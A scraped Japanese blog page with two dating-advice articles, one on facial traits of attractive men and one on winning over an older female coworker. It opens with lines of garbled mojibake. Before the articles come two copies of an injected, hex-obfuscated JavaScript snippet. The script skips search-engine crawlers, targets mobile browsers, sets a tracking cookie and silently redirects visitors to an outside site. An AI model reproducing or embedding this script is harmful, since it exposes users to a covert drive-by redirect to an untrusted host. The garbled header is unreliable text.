ai??i??a?i??ai???a??a??a?i???i???a?i??ai??i??ai???e?zai???a?Ya?i??ai??i??a?i??ai???a??a?i??a?i??e?i??ei??i??a??ai???a?Ya?i??a??ai??i??cSi?????a??ai??i??ai???a??a?i??a??a??a?i??ai??i??

a??ai??i??a??a??a??a?i??a??a?i??a?i??a??e?za?i??a?Y?i??i??a??ai???a?i??a??ai???ci???c?i??a?i??a??a??a?i??ai??i??a?i??a?i??ai??i??a?i??ai???ai??i??ai???a??ai???a?i??a??a?i??ai??i??a?i??a?i??a?i??a?i??a?i??a?i??a??a?i??a?i??a?i??ai??i??

a??a?i??e?i??ei??i??ai??i??a??a??a?i??ai??i??e?za?i??a?Ya??ai??i??a?Sai???a??a??a?i??ai??????ai??i??c??cZi??a??a?i??a??ai??Sei???a?i??a?i??a?i??ai???ai??i??

a??a??ai???

a?Se??a?i??ai??i??a?Sei??i??a?i??a?Yei??sai??Sai???e??a?i??a??a?i??a?i??a?Sai??i??a?i??a??ci??i?????a??a?Sai??i??a?i??a?i??a?i??ai??i??

a??a??e?i??a???i????i???ai??i??ai??i??a??a?i??a?Sai??i??a?i??ai??i??a?i??a?i??a?i??a?i??ai???a??a?i??a?i??a?i??ai??i??c?i??ci??i??ai??i??a??a??ai???a?zai???e?i??a?i??a??a?i??ai??i??

a??ai??i??a??a??a??ai??i??a??a??a?i??a??ai??S???ai??Sa?i??a?i??a?i??a?Ya?i??a???i???a?i??a??ai??i??ai???a??a??a?i??a?i??ai??i??a?Sai??i??a?i??a?i??a?i??ai??i??c?i??ei???a?i??a?i??a??a??a?i???i???a??a?i??a?i??a??a?i??a?i??a?i??a?i???i???a?i??a?i??a???i???a?i??a??a?i??ai??i??

e?i??a?i??a?i??ai??i???i???a?i??a?i??a?i??a??ai??i?????ai??i??a?i??ai??i??a?i??a?i??ai???a?i??a??a?Ya??a?sa??ai??i???i??i??ei??i??a?????a?i??a??a?i??a??ai??i??ai???a?i??a?i??aS?aSi??a?i??ai??i??a?i??a??ai??i??a?i??a?i??a?i??ai??i??

a?i??ai??i??a????i???i??i??a?i??a?Sa?i??a?i??ai??i??ci????i??i??a?i??a??a?i??ai???ai??i??a?i??a??ei???a?i??a??a??a?saS?aSi??a?i??ci????i??i??a?i??e??ai???a?i??ai??i??ai??i??a?i??a?i??a??a?i??ai??i??a??ai???ai???a??a??a?i??a?i??ai??i??
var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

モテる男の顔に共通する7つの特徴

人に会ったとき、最も最初に相手の情報としてはいってくるのは見た目です。

特に顔は一番はじめに目がいきますよね。

モテる男、イケメンにはいつくかの特徴があるのでその特徴を紹介していきます。

モテる男の顔の特徴

『清潔感のある肌』

ニキビや吹き出物がある肌は、それだけで相手に不潔な印象を与えてしまいます。

肌トラブルを改善させるにはそれなりに時間がかかってしまうけど、最近ではメンズ用ファンデーションなども販売されているので、気になる時にすぐ肌荒れをカバーすることができます。

どれだけ顔が整っていても、肌が汚いだけで印象はガラっと変わってしまいイケメンには見えなくなります。

まずは、肌トラブルを洗顔や保湿などのスキンケア商品を使って改善していきましょう。

『眉毛が整っている』

眉毛は顔全体のバランスをとるのに重要な部分です。

整っているだけでバランスをたもち、清潔感やおしゃれ感がぐんと上がります。

逆に手入れが行き届いていないボサボサの眉毛は、だらしなく不潔なイメージを与えてしまいます。

整えると言っても剃りすぎや抜き過ぎはよくありません。

あくまでも自分の眉毛をいかして整えることが重要になってきます。

自分で整えるのが苦手な方は、眉毛テンプレートなども販売しているのでそれを使ってみたり、ヘアサロンで眉カットをお願いするといいでしょう。

『左右の顔のバランス』

世の中に完璧に左右対称な顔をしている人間はいませんが、どちらかというと人は左右対称の顔を好みます。

普段からどちらか片方ばかり頬杖をついたり、片方だけで食べ物を噛んでいる人は要注意です。

その習慣をなおし自宅でもできるマッサージなどをすると左右対称の顔を取り戻すことができます。

しかし、無理なマッサージは余計に歪みを強くしてしまう場合があるので、エステサロンなどでプロのアドバイスを受けながら実践するといいですね。

『鼻筋が通っていてきれい』

鼻は顔の中心にある重要な部分です。

しっかりと通っている鼻筋に魅力を感じる方や、男らしく極端にゴツイ感じの骨ばった鼻筋が好きという方もいます。

鼻筋が通っているだけで、相手に「キレイな顔」や「整った顔」という印象を与えることができます。

鼻のマッサージ動画などもあるのでそれを見てマッサージしたり、ノーズシャドウというメイク方法を使って、鼻筋を多少整えることもできます。

しかし、鼻筋は生まれ持って決まっているものなので、生まれつき鼻筋が通ってない人は他の要素でモテ顔を目指したほうがいいかもしれません…。

『ぱっちりした目』

目は女性の視線がもっとも集まる部分でもあり、第一印象が決まる重要な部分です。

目と言ってもキリッとした一重やパッチリ二重など、濃いめの
顔や薄い顔がいいなどタイプがわかれますが、どちらかと言うと濃い目の顔が好みの女性が多いようです。

もっとも好まれる男性の目のタイプは、「奥二重のタレ目」だとされています。

奥二重でキリッとした男らしい目に優しいタレ目に女性は惹かれます。

奥二重にするには、毎日数分間自分のしたい二重幅でキープし続けると跡がついたり、アイプチというテープやのりも売っているのでそれを使ってみてもいいでしょう。

『歯が白い』

歯が白いと相手に清潔感を与えることができ、育ちの良さや身だしなみの整いなどトータルでいい印象を与えることができます。

逆に、コーヒーの飲み過ぎやタバコのヤニで歯が黄ばんでしまっている人は、不衛生感や不潔なイメージを与えてしまい第一印象を悪くしてしまいます。

「真っ白な歯で、きれいな歯並び」は女性が思う男性の歯の理想です。

自宅でも安価にできるホワイトニングなどもあるので、歯の黄ばみが気になる方は一度試してみるのもいいですね。

それでも黄ばみが気になる方や歯並びが気になる方は歯医者へ行き、相談してみるといいでしょう。

『小顔』

顔が小さい男性はそれだけでスタイルがよく見え、スタイルが良いとかっこよく見えるのでモテやすい傾向があります。

小顔というと骨格の問題だと諦めてしまう方もいますが、むくみなどで大きく見えてしまってる場合があります。

小顔マッサージなどの動画もあるので、それを見て参考にしながら続けていると小顔になれる可能性もあります。

まずは、やってみて骨格なのかむくみなのかわからなければメンズエステなどに行って相談するのもいいですね。

モテるためには顔だけじゃない!

『姿勢を正す』

カッコイイモテ男を目指すなら姿勢も気をつけなければなりません。

シャキッと背筋が伸びていると背が高く見えて、何より堂々とした印象を与えることができます。

逆に猫背の人は背が低く見えてしまい、根暗なイメージを与えてしまいます。

姿勢を正すだけとはいえ、猫背が癖ついているとその姿勢をなおしていくには、普段の生活から姿勢を気にして過ごしましょう。

『感謝の言葉を口にする』

どれだけ見た目が良くても、心が汚れていればモテることはありません。

常に感謝の気持ちをもち、その気持ちをきちんと言葉に表して相手に伝えます。

どんなに些細なことでも「ありがとう」を伝えるようにすれば、言われた相手はとてもいい気持ちになります。

伝えるときは、きちんと相手を見て少し微笑みながら言うとよりいいですね。

「ありがとう」と「ごめんね」は恥ずかしがらずにきちんと伝えましょう!

『細マッチョを目指す』

体型も好みがあるので分かれるところでもありますが、女性の人気が多めなのは細マッチョです。

ほどよく鍛えられた身体に抱きしめられるのは、女性の夢でもあります!

余分な脂肪を落とし、無駄のない身体を目指しましょう。

身体を鍛えると健康にもいいですし、健康的になれば血行がよくなり身体の調子もよくなるはずです。

筋トレをするだけで、得られる効果はたくさんあるので健康のために、モテるために頑張って下さい!

『笑顔がさわやか』

ふとした瞬間の笑顔がさわやかで素敵な男性はモテやすい傾向にあります。

笑顔が多い人は親しみやすく、それだけで周りに人が集まりやすいです。

集まる人数が多ければ、それだけ自分に好意を持ってくれる女性も多くなりますよね。

しかし、作った笑顔は逆に不自然になってしまいあまりいい印象を与えません。

作り笑いではなく自然と出てくるニコニコさわやか笑顔で生活できるといいですね。

まとめ

モテる男の顔の特徴について説明してきましたが、眉毛の形や髭の有無など、人によって似合う似合わないがあるのでこれらを全て改善させる必要はありません

人に会ったとき、最も最初に相手の情報としてはいってくるのは見た目であり、やはり顔です。

今回紹介した特徴を参考に「自分に一番合っている顔」を見つけれるといいですね。

職場の先輩を彼女にするための7つのテクニック

社会人になると、職場恋愛する人も多いのではないでしょうか?

なかでも恋愛に発展させにくいのは、年上女性の先輩との恋愛です。

先輩、後輩の関係に加え、年上の女性となると、恋愛対象として見てもらうのはなかなか難しいです。

そこで今回は、職場の先輩を彼女にさせるためのテクニックをご紹介したいと思います。

先入観を利用する



年下男性=子供っぽい、頼りないなどのマイナスのイメージを持たれがちです。

そのため年上女性は、年下の男性に対して初めから期待をしていませんし、基本的には恋愛対象外です。

このマイナスの先入観を、逆に利用するのがテクニックの1つです。

ふとした時に、年下と思わせない仕草や行動を見せればいいのです。

すると「あれ?この人は、私の思う年下男性と違うかも。」と興味をひくことができます。

先入観を取り除くことで、あなたが恋愛対象になれるのです。

仕事ができるのをアピールする

職場の年上女性に、仕事ができるところを見せるのは、有効なアプローチです。

普段はかわいい後輩男子でも、いざ仕事が始まると、自分の業務をテキパキとこなしていく。

このような切り替えを見せることで、先輩女子は、あなたに急に男らしさを感じてしまうこともあります。

アピールといっても、明らかにアピールしてます感を出すのはNGです。

自然に淡々と自分の業務をこなしていく姿を見てもらうのが、ポイントです。

頼れる後輩というイメージを持たせる



後輩男子は、先輩女子よりも下の立場ということから、可愛がりたい男子という存在になりやすいです。

そのため、基本的には恋愛対象外になってしまうのです。

そのイメージを変えるためには、頼れる一面を見せなくてはなりません。

普段は、先輩が思う可愛い後輩でかまいません。

ですが、先輩がミスをしたり、同僚が困っている時に助けたり、年下というのを感じさせない男らしさを見せるも効果的なアプローチです。

先輩に対して男らしいふるまいをするのもいいでしょう。

それに加えて、同僚などに対しても男らしいふるまいをして、間接的にアピールするのも効果的なんだとか。

その結果、「ただの可愛い後輩だと思っていたけど、こんなに男らしい一面があったんだ。

と、ここで初めて「後輩」ではなく「男性」として意識させることができます。

ただ仕事のミスなどをフォローするには、あなたの能力も高めておかなくてはなりません。

仕事の能力を高めることは、あなた自身にもプラスになることですから、あらゆることに対応できるよう、知識を身につけておくと良いでしょう。

弱い面を引き出す

先輩という立場上、後輩の前ではしっかりしなくてはと肩に力が入りがちです。

そのため、そう簡単にあなたには弱音や悩みを言うことはないでしょう。

これは、年齢や仕事のキャリアに差があるほど、なおさらです。

そんなときに「たまには部下にも頼ってください。」「僕も力にならせてください。」などの一声をかけてみてください。

このような声がけで、精神的に自分が上になれる時があるのを、先輩女子に感じさせることができるのです。

心理的に上に立って初めて、年齢を気にせず対等に向き合えます。

これがきっかけで、「後輩には甘えないと思っていたけど、〇〇君になら弱いところを見せてもいいのかな。」などと思わせられる場合があります。

このように弱い面を引き出すことができたとき、2人の距離は一気に縮まることでしょう。

先輩女子の態度に変化が見られたら、恋愛対象に変化している可能性があります。

先輩の女子の部分を見つける

初めでもお話ししたように、先輩女子は後輩男子に対して、先入観を持っています。

ですがこれは、年上女性に想いを寄せている後輩男子にも言えることなのです。

「年上女性=大人の女性」という先入観を持っている人が多い傾向にあります。

そのため食事やデートなどに行けるとなると、大人の女性が好みそうな場所をリサーチしたりと、背伸びしたプランを考えがちです。

それでも喜んでもらえると思いますが、彼女の大人でない一面を見つけることのほうが大切です。

どんなにバリバリ仕事をこなす先輩でも、必ず可愛らしい女子の部分が存在しています。

バリバリ仕事をこなしているのは表面上で、女子の部分は、先輩女子の素の部分なのです。

ですから、先輩のことをよく観察してみてください。

食事のときなど、美味しい物を食べた時に満面の笑みを浮かべていたり、使っている小物にキャラクター物があったり、このような女子の一面に気付くのもテクニックの1つです。

先輩の女子の部分を垣間見たときに、ふと「先輩の〇〇なところ、可愛いですよね。」など声かけしてみてください。

すると、素の部分を見られた恥ずかしさと共に、自分のことをよく見てくれていることに気付いてもらえるきっかけにもなると思います。

母性本能をくすぐる

頼れる後輩、男らしさを持つ後輩と思わせるのは、大切なアピールポイントです。

しかし、それでは頼れる年上男性と変わらなくなってしまいます。

そこで、年上男性との違いをつけるには、年下であることを最大限に利用しましょう。

年下というだけで、女性の母性本能はくすぐりやすいのです。

ですから、無邪気な笑顔を見せるだけでも可愛いと思わせることができます。

これは年下ならではないでしょうか。

普段はかわいい後輩男子でも、ここぞという時に頼りになる。

このバランスが大事です。

このようなギャップに、先輩女子はドキッとしてしまい、恋愛対象外から恋愛対象に変化する可能性があります。

「年齢は関係ない」と伝え続ける

特に女性が年上の場合、年齢を気にしやすいです。

ですから、普段から「年齢なんて関係ないですよ」と先輩女子には伝え続けましょう。

すると、先輩からも年下は恋愛対象外という考えを取り除きやすくなります。

なかには、そんなセリフに男らしさを感じることもありますよ。

まとめ

年上女性を彼女にするのは、少々難易度が高いです。

ですが初めがマイナスイメージのため、少し違う一面を覗かせることで、一気に距離を縮められるという利点もあります。

もしあなたが今、職場の先輩に想いを寄せているなら、ぜひ今回紹介したテクニックを参考にしてみてください。